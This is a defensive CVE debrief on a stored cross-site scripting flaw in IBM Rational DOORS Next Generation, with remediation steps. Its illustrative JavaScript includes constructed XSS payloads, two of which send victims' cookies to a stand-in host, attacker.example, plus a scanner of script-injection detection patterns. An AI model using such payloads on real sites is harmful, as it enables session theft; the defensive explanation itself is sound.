PatchSiren cyber security CVE debrief
CVE-2017-1128 IBM CVE debrief
CVE-2017-1128 is a cross-site scripting vulnerability in IBM Rational DOORS Next Generation and related Rational Requirements Composer releases. The issue lets an authenticated user embed arbitrary JavaScript in the web UI; when another user views that content, the script runs in their trusted browser session, where it can alter intended application behavior and may expose credentials or session data. The record was published on 2017-02-08 and later modified in NVD without changing the original disclosure date.
- Vendor
- IBM
- Product
- IBM Rational DOORS Next Generation; IBM Rational Requirements Composer
- CVSS
- MEDIUM 5.4
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2017-02-08
- Original CVE updated
- 2026-05-13
- Advisory published
- 2017-02-08
- Advisory updated
- 2026-05-13
Who should care
Organizations running IBM Rational DOORS Next Generation 4.0, 5.0, or 6.0, and IBM Rational Requirements Composer 4.0.x releases should treat this as relevant, especially if users rely on the web UI for collaboration or requirement management. Administrators, application owners, and security teams should verify whether any affected versions are deployed.
Technical summary
NVD classifies the weakness as CWE-79 (cross-site scripting) with CVSS 3.0 vector CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N. Read against the description, the vector says: the attacker needs an account with low privileges (PR:L) and network access to the web UI (AV:N); the victim must interact, that is, view the content in which the script was stored (UI:R); and scope is changed (S:C) because the script executes in the victim's browser rather than in the vulnerable application itself. Confidentiality and integrity impact are rated low, with no availability impact indicated.
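The following is an added illustration of the CWE-79 pattern the record describes; it is not code from IBM or from the affected products, and the requirement record, field names and the attacker host attacker.example are constructed for the example. It shows a renderer that concatenates untrusted requirement text straight into markup beside one that escapes every untrusted value first, which is the generic fix for this class of flaw.

```javascript
// Added example, not IBM's code: a stored-XSS pattern of the kind CWE-79
// describes, shown as a vulnerable renderer beside a hardened one.
// Record shape, field names and the sample payload are constructed.

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

// Vulnerable: untrusted requirement text goes straight into the markup,
// so anything a low-privileged author stored is interpreted as HTML.
function renderRequirementVulnerable(req) {
  return `<div class="req"><h3>${req.title}</h3><p>${req.text}</p></div>`;
}

// Hardened: every untrusted value is escaped before it reaches the markup,
// so the same payload is displayed as text instead of executed.
function renderRequirementHardened(req) {
  return `<div class="req"><h3>${escapeHtml(req.title)}</h3>` +
         `<p>${escapeHtml(req.text)}</p></div>`;
}

// Constructed sample: a requirement whose body carries a script that
// exfiltrates the viewer's cookies to an attacker-controlled host.
const hostileRequirement = {
  title: 'REQ-42 Login timeout',
  text: 'Session ends after 15 min<script>fetch("https://attacker.example/?c="' +
        '+document.cookie)</script>',
};

// True when the rendered output still contains a live <script> element.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log(containsScriptTag(renderRequirementVulnerable(hostileRequirement))); // true
console.log(containsScriptTag(renderRequirementHardened(hostileRequirement)));   // false
```

Escaping at output time, as in the hardened renderer, is the control that removes the flaw; input filtering alone can be bypassed and is only a stop-gap, which is why the vendor patch rather than content review is the real remediation.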
Defensive priority
Medium. This is an important web application input-handling flaw that requires a low-privileged account and victim interaction, and its rated impact is low on confidentiality and integrity; but because the scope is changed, a stored payload runs in every affected user's browser and can expose session data or manipulate application behavior on their behalf.
Recommended defensive actions
- Confirm whether IBM Rational DOORS Next Generation or Rational Requirements Composer versions listed by NVD are in use.
- Review the IBM PSIRT advisory and apply the vendor patch or mitigation referenced there.
- Treat any user-generated content or web UI fields in the affected product as untrusted until patched.
- If immediate patching is not possible, reduce exposure by limiting access to the application and restricting who can submit content into affected UI paths.
- Audit stored requirement content and recent edits for embedded markup (script tags, inline event handlers, javascript: URLs) and review the accounts that submitted it; browser-side anomalies reported by affected users should be treated as possible indicators.
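As an added example of the audit step above, not a tool from IBM or part of the affected products, the script below scans an exported set of requirement records for markup that indicates stored script injection. The export format, record fields and sample rows are constructed; a real export would need its own field list. It decodes numeric HTML entities before matching, because attribute-context payloads are commonly obfuscated that way.

```javascript
// Added example, not IBM's code: offline audit of exported requirement
// content for stored script injection. Record shape and sample rows are
// constructed; adapt the field list to the real export.

// Heuristic indicators of executable content in stored text. Each is a
// pattern a browser would act on if the value reached the page unescaped.
const SCRIPT_INDICATORS = [
  { name: 'script-tag',       re: /<\s*script\b/i },
  { name: 'event-handler',    re: /\bon[a-z]+\s*=/i },
  { name: 'javascript-url',   re: /(?:href|src|action)\s*=\s*["']?\s*javascript:/i },
  { name: 'embedded-frame',   re: /<\s*(?:iframe|object|embed)\b/i },
];

// Decode numeric entities (&#106; and &#x6a; both become "j") so that an
// obfuscated "javascript:" in an attribute is visible to the patterns.
// Named entities such as &lt; are left alone: they render as text, not markup.
function decodeNumericEntities(s) {
  return String(s).replace(/&#(x[0-9a-f]+|\d+);?/gi, (match, body) => {
    const cp = body[0].toLowerCase() === 'x'
      ? parseInt(body.slice(1), 16)
      : parseInt(body, 10);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
  });
}

// Scan the listed fields of one record; return one hit per matching indicator.
function scanRecord(record, fields = ['title', 'text']) {
  const hits = [];
  for (const field of fields) {
    const value = decodeNumericEntities(record[field] ?? '');
    for (const { name, re } of SCRIPT_INDICATORS) {
      if (re.test(value)) hits.push({ id: record.id, field, indicator: name });
    }
  }
  return hits;
}

function scanExport(records) {
  return records.flatMap((r) => scanRecord(r));
}

// Constructed sample export: two benign rows and four stored payloads.
const SAMPLE_EXPORT = [
  { id: 'REQ-1', title: 'Password length', text: 'Passwords shall be at least 12 characters.' },
  { id: 'REQ-2', title: 'Timeout', text: 'Session ends after 15 min<script>alert(1)</script>' },
  { id: 'REQ-3', title: 'Logo', text: '<img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">' },
  { id: 'REQ-4', title: 'Link', text: '<a href="javascript:void(0)">click</a>' },
  { id: 'REQ-5', title: 'Encoded', text: '<a href="&#106;avascript:alert(1)">click</a>' },
  { id: 'REQ-6', title: 'Prose', text: 'The onboarding flow is described in section 3.' },
];

for (const hit of scanExport(SAMPLE_EXPORT)) {
  console.log(`${hit.id} ${hit.field}: ${hit.indicator}`);
}
```

The indicators are deliberately broad; the output is a review queue for an administrator, not a verdict, and each flagged record should be traced back to the submitting account in the application's history.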
Evidence notes
All statements above are derived from the supplied NVD record and its references. The vulnerability is identified as CWE-79 with the CVSS vector provided in the source item metadata. A vendor advisory and patch reference are listed by IBM PSIRT at http://www.ibm.com/support/docview.wss?uid=swg21996645, and a third-party advisory entry is listed at http://www.securityfocus.com/bid/96017. The supplied corpus does not include patch version details beyond the affected CPE ranges.
Official resources
- CVE-2017-1128 CVE record (CVE.org)
- CVE-2017-1128 NVD detail (NVD)
- Source item: nvd_modified
- Mitigation or vendor reference: IBM PSIRT advisory, http://www.ibm.com/support/docview.wss?uid=swg21996645 (Patch, Vendor Advisory)
- Mitigation or vendor reference: SecurityFocus BID 96017, http://www.securityfocus.com/bid/96017 (Third Party Advisory, VDB Entry)
Publicly disclosed on 2017-02-08. The later NVD modified date of 2026-05-13 reflects record maintenance, not the original issue date.